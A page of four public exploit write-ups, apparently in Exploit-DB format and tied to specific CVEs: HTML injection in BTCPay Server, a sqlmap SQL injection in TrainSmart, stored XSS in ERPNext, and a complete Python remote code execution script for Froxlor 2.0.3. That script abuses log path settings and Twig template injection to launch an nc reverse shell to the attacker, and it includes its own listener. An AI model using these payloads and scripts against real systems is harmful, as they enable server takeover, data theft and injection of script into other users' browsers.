<pre><code># Exploit Title: BTCPay Server v1.7.4 - HTML Injection<br /># Date: 01/26/2023<br /># Exploit Author: Manojkumar J (TheWhiteEvil)<br /># Vendor Homepage: https://github.com/btcpayserver/btcpayserver<br /># Software Link:<br />https://github.com/btcpayserver/btcpayserver/releases/tag/v1.7.5<br /># Version: <=1.7.4<br /># Tested on: Windows10<br /># CVE : CVE-2023-0493<br /><br /># Description:<br /><br />BTCPay Server v1.7.4 HTML injection vulnerability.<br /><br /># Steps to exploit:<br /><br />1. Create an account on the target website.<br /><br />Register endpoint: https://target-website.com/register#<br /><br />2. Move on to the API key and create API key with the html injection in the<br />label field.<br /><br />Example:<br /><br /><a href="https://hackerbro.in">clickhere</a><br /><br /><br />3. Click remove/delete API key, the html injection will render.<br /><br /></code></pre>
<pre><code># Exploit Title: itech TrainSmart r1044 - SQL injection<br /># Date: 03.02.2023<br /># Exploit Author: Adrian Bondocea<br /># Software Link: https://sourceforge.net/p/trainsmart/code/HEAD/tree/code/<br /># Version: TrainSmart r1044<br /># Tested on: Linux<br /># CVE : CVE-2021-36520<br /><br />SQL injection vulnerability in itech TrainSmart r1044 allows remote<br />attackers to view sensitive information via crafted command using sqlmap.<br /><br />PoC:<br />sqlmap --url 'http://{URL}//evaluation/assign-evaluation?id=1' -p id -dbs<br /><br /></code></pre>
<pre><code># Exploit Title: ERPNext 12.29 - Cross-Site Scripting (XSS)<br /># Date: 7 Feb 2023 <br /># Exploit Author: Patrick Dean Ramos / Nathu Nandwani / Junnair Manla<br />#Github - https://github.com/patrickdeanramos/CVE-2022-28598<br /># Vendor Homepage: https://erpnext.com/<br /># Version: 12.29<br /># CVE-2022-28598<br /><br />Summary: Stored cross-site scripting (XSS) vulnerability was found in ERPNext 12.29 where the <br />"last_known_version" field found in the "My Setting" page in ERPNext <br />12.29.0 allows remote attackers to inject arbitrary web script or HTML via <br />a crafted site name by doing an authenticated POST HTTP request to <br />'/desk#Form/User/(Authenticated User)' and inject the script in the <br />'last_known_version' field where we are able to view the script by <br />clicking the 'pdf' view form.<br /><br />This vulnerability is specifically the "last_known_version" field found <br />under the 'My Settings' where we need to first save the my settings.<br /><br />1. Login as any user<br />2. Under the ‘last_known_version’ field we are going to inject our <br />malicious script.<br />3. To view our injected script we need to click the view pdf page, and as <br />seen below we have successfully injected our script.<br /><br /><br /></code></pre>
<pre><code>#!/usr/bin/python3<br /><br /># Exploit Title: Froxlor 2.0.3 Stable - Remote Code Execution (RCE)<br /># Date: 2023-01-08<br /># Exploit Author: Askar (@mohammadaskar2)<br /># CVE: CVE-2023-0315<br /># Vendor Homepage: https://froxlor.org/<br /># Version: v2.0.3<br /># Tested on: Ubuntu 20.04 / PHP 8.2<br /><br />import telnetlib<br />import requests<br />import socket<br />import sys<br />import warnings<br />import random<br />import string<br />from bs4 import BeautifulSoup<br />from urllib.parse import quote<br />from threading import Thread<br /><br />warnings.filterwarnings("ignore", category=3DUserWarning, module=3D'bs4')<br /><br /><br />if len(sys.argv) !=3D 6:<br /> print("[~] Usage : ./froxlor-rce.py url username password ip port")<br /> exit()<br /><br />url =3D sys.argv[1]<br />username =3D sys.argv[2]<br />password =3D sys.argv[3]<br />ip =3D sys.argv[4]<br />port =3D sys.argv[5]<br /><br />request =3D requests.session()<br /><br />def login():<br /> login_info =3D {<br /> "loginname": username,<br /> "password": password,<br /> "send": "send",<br /> "dologin": ""<br /> }<br /> login_request =3D request.post(url+"/index.php", login_info, allow_redi=<br />rects=3DFalse)<br /> login_headers =3D login_request.headers<br /> location_header =3D login_headers["Location"]<br /> if location_header =3D=3D "admin_index.php":<br /> return True<br /> else:<br /> return False<br /><br /><br />def change_log_path():<br /> change_log_path_url =3D url + "/admin_settings.php?page=3Doverview&part=<br />=3Dlogging"<br /> csrf_token_req =3D request.get(change_log_path_url)<br /> csrf_token_req_response =3D csrf_token_req.text<br /> soup =3D BeautifulSoup(csrf_token_req_response, "lxml")<br /> csrf_token =3D (soup.find("meta", {"name":"csrf-token"})["content"])<br /> print("[+] Main CSRF token retrieved %s" % csrf_token)<br /><br /> multipart_data =3D {<br /><br /> "logger_enabled": (None, "0"),<br /> "logger_enabled": (None, "1"),<br /> "logger_severity": (None, "2"),<br /> "logger_logtypes[]": (None, "file"),<br /> "logger_logfile": (None, "/var/www/html/froxlor/templates/Froxlor/f=<br />ooter.html.twig"),<br /> "logger_log_cron": (None, "0"),<br /> "csrf_token": (None, csrf_token),<br /> "page": (None, "overview"),<br /> "action": (None, ""),<br /> "send": (None, "send")<br /> =20<br /> }<br /> req =3D request.post(change_log_path_url, files=3Dmultipart_data)<br /> response =3D req.text<br /> if "The settings have been successfully saved." in response:<br /> print("[+] Changed log file path!")<br /> return True<br /> else:<br /> return False<br /><br /><br />def inject_template():<br /> admin_page_path =3D url + "/admin_index.php"<br /> csrf_token_req =3D request.get(admin_page_path)<br /> csrf_token_req_response =3D csrf_token_req.text<br /> soup =3D BeautifulSoup(csrf_token_req_response, "lxml")<br /> csrf_token =3D (soup.find("meta", {"name":"csrf-token"})["content"])<br /> onliner =3D "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {0} =<br />{1} >/tmp/f".format(ip, port)<br /> payload =3D "{{['%s']|filter('exec')}}" % onliner<br /> data =3D {<br /> "theme": payload,<br /> "csrf_token": csrf_token,<br /> "page": "change_theme",<br /> "send": "send",<br /> "dosave": "",<br /> }<br /> req =3D request.post(admin_page_path, data, allow_redirects=3DFalse)<br /> try:<br /> location_header =3D req.headers["Location"]<br /> if location_header =3D=3D "admin_index.php":<br /> print("[+] Injected the payload sucessfully!")<br /> except:<br /> print("[-] Can't Inject payload :/")<br /> exit()<br /> handler_thread =3D Thread(target=3Dconnection_handler, args=3D(port,))<br /> handler_thread.start()<br /> print("[+] Triggering the payload ...")<br /> req2 =3D request.get(admin_page_path)<br /><br /><br />def connection_handler(port):<br /> print("[+] Listener started on port %s" % port)<br /> t =3D telnetlib.Telnet()<br /> s =3D socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br /> s.bind(("0.0.0.0", int(port)))<br /> s.listen(1)<br /> conn, addr =3D s.accept()<br /> print("[+] Connection received from %s" % addr[0])<br /> t.sock =3D conn<br /> print("[+] Heads up, incoming shell!!")<br /> t.interact()<br /><br /><br /><br />if login():<br /> print("[+] Successfully Logged in!")<br /> index_url =3D url + "/admin_index.php"<br /> request.get(index_url)<br /> if change_log_path():<br /> inject_template()<br /><br />else:<br /> print("[-] Can't login")<br /> <br /><br /></code></pre>